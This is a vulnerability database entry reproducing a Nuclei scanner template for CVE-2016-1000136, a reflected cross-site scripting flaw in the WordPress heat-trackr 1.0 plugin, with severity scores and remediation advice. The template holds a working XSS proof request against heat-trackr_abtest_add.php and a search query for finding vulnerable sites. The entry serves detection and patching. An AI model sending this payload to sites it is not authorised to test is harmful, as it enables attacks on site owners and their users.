Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-1000136
HistoryOct 25, 2021 - 1:05 p.m.

WordPress heat-trackr 1.0 - Cross-Site Scripting

2021-10-2513:05:08
ProjectDiscovery
github.com
2
cve2016
wordpress
cross-site scripting
wp-plugin
heat-trackr_project

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

46.3%

WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2016-1000136

info:
  name: WordPress heat-trackr 1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  remediation: |
    Upgrade to the latest version of WordPress heat-trackr or apply the provided patch to fix the XSS vulnerability.
  reference:
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=798
    - https://wordpress.org/plugins/heat-trackr
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000136
    cwe-id: CWE-79
    epss-score: 0.00119
    epss-percentile: 0.46028
    cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "heat-trackr_project"
    product: "heat-trackr"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/heat-trackr\""
  tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/plugins/heat-trackr/'

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d7d5813a2579ff4b5cfeb38f14f242d477361de5abcb483e7c5ed4b9c5ebff2102204dcdfecc6975505a26bde4fff51512b2ff84bb9e86f6b4f48428b871fd2fa745:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

46.3%

Related for NUCLEI:CVE-2016-1000136